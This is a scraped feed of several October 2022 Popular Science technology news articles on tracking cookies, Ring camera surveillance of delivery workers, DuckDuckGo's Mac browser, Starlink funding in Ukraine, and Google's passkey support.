Third-party tracking cookies, on the other hand, are the kind of cookies that privacy experts are most concerned about. Combined with other kinds of tracking, they allow companies and data brokers to create incredibly detailed profiles of your online activities. In Mozilla’s blog post, Kim said that the advertising companies would have been able to link the age of her children, her partner’s interests, and the tours that she booked together. In theory, the information would have been anonymous as it would have likely been linked to a user ID rather than her name and address—but these anonymous profiles are startlingly easy to de-anonymise

Worse, though, is that the same companies could also have built profiles for her hypothetical kids. This process starts early. Period and fertility-tracking apps—which are currently under a lot of scrutiny due to the Roe V Wade being overturned in the US—essentially start collecting information about children before they are even born. As their parents search the web for answers to parenting questions, to book vacations, and everything else, that profile grows. Some companies are even gathering and selling data from children while they attend classes online. One pre-pandemic report found that by the time a child is 13, over 72 million pieces of personal data will have been collected on them. That figure is almost certainly higher now. 

To counter this, Kim suggests using Firefox which has Total Cookie Protection—a special browser mode that silos cookies to prevent third-party tracking cookies following you around the web—enabled by default. However, most modern browsers now offer similar features. Safari blocks all cross-site tracking, including cookies, by default with a feature called Intelligent Tracking Prevention. Brave, Opera, and the new DuckDuckGo browser all use similar strategies to block third-party cookies while still allowing websites to function normally. Even Microsoft Edge has an option—but you will need to enable its stricter settings. The only real holdout is Google Chrome (unsurprisingly)—but even it is due to start blocking them next year.

Cookies as a tracking tool are on the way out. Soon enough, only users with old and obsolete versions of web browsers will be capable of being tracked using them. The bigger problem, unfortunately, is that tracking continues to evolve.  Soon, there might be a whole range of alternative tracking tools that will need to be avoided. In particular, first-party tracking by the websites you visit is very hard to prevent. And while you can block cookies, it’s impossible to stop Google from knowing everything you do across Google properties like Gmail and YouTube. If you are logged into your account, it can see every YouTube video you watch, every document you share, and what you search for.

The post Booking a trip online? Here’s what tracking cookies could be gathering about your family. appeared first on Popular Science.

Articles may contain affiliate links which enable us to share in the revenue of any purchases made.

]]>
Ring camera surveillance puts new pressure on Amazon gig workers https://www.popsci.com/technology/amazon-ring-camera-gig-workers/ Thu, 20 Oct 2022 20:00:00 +0000 https://www.popsci.com/?p=479732
Close up of Amazon Ring security camera mounted outside building
The report calls Amazon's ecosystem 'ingenious.'. Deposit Photos

A new study from Data & Society details pervasive behavior among Ring owners towards delivery workers.

The post Ring camera surveillance puts new pressure on Amazon gig workers appeared first on Popular Science.

]]>
Close up of Amazon Ring security camera mounted outside building
The report calls Amazon's ecosystem 'ingenious.'. Deposit Photos

Amazon’s Ring security cameras are far and away the most popular home surveillance products on the market. For years, the commerce giant has involved the cameras in everything from police partnerships to family friendly television shows. But as a new report courtesy of research organization Data & Society details, the motivation goes far beyond mere profits—the Ring network serves as de facto surveillance system for Amazon delivery drivers and gig workers by encouraging “boss behavior” in camera owners.

“[T]he technological advances of security cameras combined with social media networks encourage changes in customer behavior, constituting a new form of workplace management that extends beyond the familiar forms of workplace monitoring,” write co-authors Aiha Nguyen and Eve Zelickso.

Through interviews with both Ring camera owners and Amazon employees, Data & Society pinpointed a number of factors converging to create a new managerial class of citizen who, often unwittingly, provides free labor to the company. Much of this hinges on what report’s authors dub “boss behavior,” or “a range of actions, often undertaken in the name of safety or package security, that also function as the direct management of delivery workers.”

[Related: ‘Ring Nation’ hits cable TV nationwide.]

As Motherboard explains in its analysis of the report, “Customers were… open about how the use of surveillance cameras encouraged them to penalize drivers more, whether by reporting them to Amazon, alerting law enforcement, or sharing footage online to shame them.”

This method is “ingenious,” write the authors. “Amazon has managed to transform what was once a labor cost (i.e., supervising work and asset protection) into a revenue stream through the sale of doorbell cameras and subscription services to residents who then perform the labor of securing their own doorstep,” they write in the report.

This unhealthy dynamic is only exacerbated by reported stressful and often dangerous working conditions experienced by full-time deliverers and gig employees enrolled in Amazon Flex, the company’s version of an on-demand gig labor force akin to Uber and DoorDash. Like other similar services, Flex bills itself as offering people a more customizable job via variably hours and pay schedules, alongside the ability to choose their own healthcare options via the open marketplace. The report notes, however, interviews with Flex drivers made it clear that the supposed perks “have hidden costs: drivers often have to compete for shifts, spend hours trying to get reimbursed for lost wages, pay for wear and tear on their vehicle, and have no control over where they work.”

Speaking with PopSci, Ryan Gerety, Acting Director of the Amazon-focused labor and activist coalition, Athena, says Data & Society’s report “confirms what workers, small businesses, and communities of color have long known: Amazon is not just an online store. It is a surveillance empire that fuels fear and mistrust,” adding the company is “turning everyday people into bosses and police” through its Ring camera systems.

The embrace of gig economics by many companies has had an effect on the American workforce. A Pew Research report from last year estimates that as much as 16 percent of Americans have earned some form of income from a gig platform. While many report positive experiences, a troubling number have cited issues including harassment, danger, and unwanted sexual advances. Roughly 42 percent of gig workers aged 18-29, for example, recounted instances in which they felt unsafe, with a quarter of respondents citing sexual harassment.

The post Ring camera surveillance puts new pressure on Amazon gig workers appeared first on Popular Science.

Articles may contain affiliate links which enable us to share in the revenue of any purchases made.

]]>
DuckDuckGo just made its privacy-centric browser available for all Mac users https://www.popsci.com/technology/duckduckgo-browser-mac/ Tue, 18 Oct 2022 15:00:00 +0000 https://www.popsci.com/?p=478789
DuckDuckGo browser displaying Duck Player YouTube video portal
'Duck Player' is a go. This is not a drill. DuckDuckGo

New additions to DuckDuckGo's open beta browser include Duck Player, which blocks YouTube ad trackers.

The post DuckDuckGo just made its privacy-centric browser available for all Mac users appeared first on Popular Science.

]]>
DuckDuckGo browser displaying Duck Player YouTube video portal
'Duck Player' is a go. This is not a drill. DuckDuckGo

DuckDuckGo announced this morning that its privacy-centric web browser app is now officially available via open beta test to all Mac users. First debuted back in April, the default incognito browser was originally only available via a waitlisted closed beta, but now any Apple device owner can download the alternative option to try ahead of its official public rollout.

According to the official news release, DuckDuckGo for Mac’s built-in safeguards include the ability to block trackers before they even load, reportedly resulting in around 60 percent less data usage than Chrome. Other features include prerequisite pop-up blockers and DuckDuckGo’s popular “Fire Button” shortcut, which can instantly clear your existing browser data.

[Related: 7 tips for using DuckDuckGo.]

Another major addition to “version 0.30” is Duck Player, an adorably named portal that guards users from cookies and targeted ad tracking while they stream YouTube content. According to DuckDuckGo, Duck Player sometimes actually prevented any ads from playing at all. Your views will still add towards YouTube’s overall viewership counts, but at least you don’t have to worry about all those personalized commercials. The browser now also includes bookmarks and pinned tabs, as well as a way to look at “locally stored” browsing history.

Back in August, DuckDuckGo opened up its beta email service to the public, which is designed to minimize companies’ email trackers that are often sneakily hidden within messages for targeted advertising purposes and profit. Apart from its actual utility, the fact that you can now get an email address ending in “@duck.com” is pretty great, in and of itself.

The curious among you can download the beta browser now, which can also port over all your existing bookmarks, as well as any passwords you’re comfortable having stored on DuckDuckGo’s native secure vault. There’s also the option to utilize its collaboration with the open-source manager, Bitwarden, or even 1Password‘s new universal autofill feature. Windows users aren’t forgotten, by the way—DuckDuckGo’s announcement today promises a private beta test for Team PC is “expected in the coming months,” so be on the lookout for that, too.

Update 10/18/23: This article has been updated to better reflect DuckDuckGo’s browser password features.

The post DuckDuckGo just made its privacy-centric browser available for all Mac users appeared first on Popular Science.

Articles may contain affiliate links which enable us to share in the revenue of any purchases made.

]]>
SpaceX says it can no longer fund Ukraine’s Starlink access https://www.popsci.com/technology/elon-musk-ukraine-starlink/ Fri, 14 Oct 2022 17:30:00 +0000 https://www.popsci.com/?p=477954
Two photos of Elon Musk on smartphone screens
Other reports indicate the decision may be more financially motivated. Deposit Photos

Following an exchange on Twitter, the move may put Ukrainian defense at risk.

The post SpaceX says it can no longer fund Ukraine’s Starlink access appeared first on Popular Science.

]]>
Two photos of Elon Musk on smartphone screens
Other reports indicate the decision may be more financially motivated. Deposit Photos

Elon Musk threatened to cut off Ukrainian armed forces’ funding for vital Starlink terminals on Friday morning, suggesting that he is “merely following [the] recommendation” of a Ukrainian diplomat’s recent Twitter reply. On October 3, the multibillionaire CEO of Tesla and SpaceX suggested the country cede the entirety of Crimea to Russia via multiple social media polls, prompting Ukraine’s ambassador to Germany to tell Musk to, in so many words, back off.

Musk’s hint comes shortly after CNN relayed news this week that his satellite internet company recently informed the Pentagon it could no longer afford to continue offering aid to the nation, whose citizens have pushed back against invading Russian forces since February. Ukrainian military officials have repeatedly voiced their troops’ reliance on the satellite internet access.

[Related: Elon Musk offers to buy Twitter (again).]

Unlike other forms of communication, Starlink’s satellite internet allows Ukrainian forces to coordinate and remain connected across the country even without standard cellular data and ground internet infrastructures. Using the company’s (pricey) terminals and antennae, users instead rely on a network of thousands of orbital satellites—far from Russian weaponry—to ensure they not only stay online, but are able to coordinate campaigns like drone and artillery strikes. Without them, Ukraine is “really operating in the blind in many cases,” explained one policy expert, per CNN’s report.

Despite Musk’s implication that the tipping point for Starlink cutting services to Ukraine could be due to Melnyk’s retort, the decision may be far more related to finances than word choice. “Though Musk has received widespread acclaim and thanks for responding to requests for Starlink service to Ukraine right as the war was starting, in reality, the vast majority of the 20,000 terminals have received full or partial funding from outside sources,” CNN exclusively reported in its summary of a recent letter delivered to the Pentagon from SpaceX. The US government, the UK, and Poland have already funded a combined 85-percent of all terminals made available to the Ukrainian military, per SpaceX’s own figures as seen by CNN.

[Related: The shuffling Optimus robot revealed at Tesla’s AI Day.]

SpaceX estimates that an entire year’s worth of Starlink terminals and support would run Ukraine and its allies $380 million. Musk is worth $212 billion, along with SpaceX which is valued at $127 billion—$2 billion of which was raised this past year. The day after Musk’s Twitter polls, he offered to buy the social media platform once again for $44 billion, after attempting to back out of the business acquisition earlier this year.

The post SpaceX says it can no longer fund Ukraine’s Starlink access appeared first on Popular Science.

Articles may contain affiliate links which enable us to share in the revenue of any purchases made.

]]>
Google’s new passkey support is helping kill the password https://www.popsci.com/technology/google-enables-passkey-support/ Fri, 14 Oct 2022 16:31:21 +0000 https://www.popsci.com/?p=478059
Security photo
Deposit Photos / bennymarty

It's still in beta, but the tech is part of an important, larger initiative involving Apple and Microsoft, too.

The post Google’s new passkey support is helping kill the password appeared first on Popular Science.

]]>
Security photo
Deposit Photos / bennymarty

Passwords are a pain. People use the same insecure passwords over and over again and yet still manage to forget them, which makes protecting accounts and data challenging for big tech companies. Even when someone does use a password that is long and complex enough to be relatively secure—because, say, they have a password manager—it is still vulnerable to social engineering attacks like phishing. All in all, passwords are a terrible system for protecting personal data, sensitive information, and your dog photos—which is why Apple, Google, Microsoft, and the rest of the FIDO Alliance are so keen to replace them with an approach called passkeys. And they’re doing it right now. 

This week, Google announced that it was bringing passkey support to Android and Chrome—or at least to their latest beta software. If you’re enrolled in the Google Play Services beta or the Chrome Canary channel, you will be able to use them right now to log in to websites that support them. Google says they will come to the stable releases later this year and that their next milestone for 2022 will be to release an API (an application programming interface) to allow native Android apps to support them. 

Google supporting passkeys in its products is a big step towards widespread adoption. Apple started supporting passkeys on the iPhone with iOS 16 and will support them on Macs later this year with macOS Ventura. Once Google adds them to Android and Chrome, the two most popular mobile platforms and the two most popular browsers will support them. That’s huge.

Passkeys use public key cryptography to create a more secure authentication protocol than passwords. When you sign up for a new account with a passkey, your device will create a pair of keys—a public key that is shared with the service and a private key that it stores securely locked behind your biometric data or a PIN. 

[Related: Apple’s passkeys could be better than passwords. Here’s how they’ll work.]

Because of the underlying math, the public key can be public, as its name implies. It doesn’t matter if the site gets hacked and it is released in a data breach or shared on social media, it isn’t enough to log in to your account. It only allows the website to verify that your device has the right private key saved. 

And the system is set up so that all user verification is handled by your device. This means your private key is never transmitted over the internet, which makes passkeys basically impossible to phish or steal. Instead, a temporary single-use token is sent that tells the website that you have the right private key. It’s really a great system. 

[Related: Apple, Google, and Microsoft team up for new password-free technology]

But perhaps the best thing about passkeys isn’t that they’re more secure, but that they’re much more convenient to use. In the blog post announcing passkey support, Google explains how you are able to create a passkey or log in to an account just using your fingerprint, face, or screen lock code—it’s literally two steps. You don’t have to worry about coming up with a long code or adding the requisite number of special symbols. And you don’t have to remember them either—they will automatically be synced in the background between your devices using Google Password Manager. Basically, the user experience will be like an autofilling password—but better and more reliable.

And, because passkeys are an industry standard, you will also be able to use your phone to log in to nearby devices regardless of what operating system they have. Say you need to print something using a friends’ Mac. You can log in to your Gmail account in Safari just by scanning a QR code on your Android phone. Really, the long sought-after passwordless future is coming soon—and it looks great. 

The post Google’s new passkey support is helping kill the password appeared first on Popular Science.

Articles may contain affiliate links which enable us to share in the revenue of any purchases made.

]]>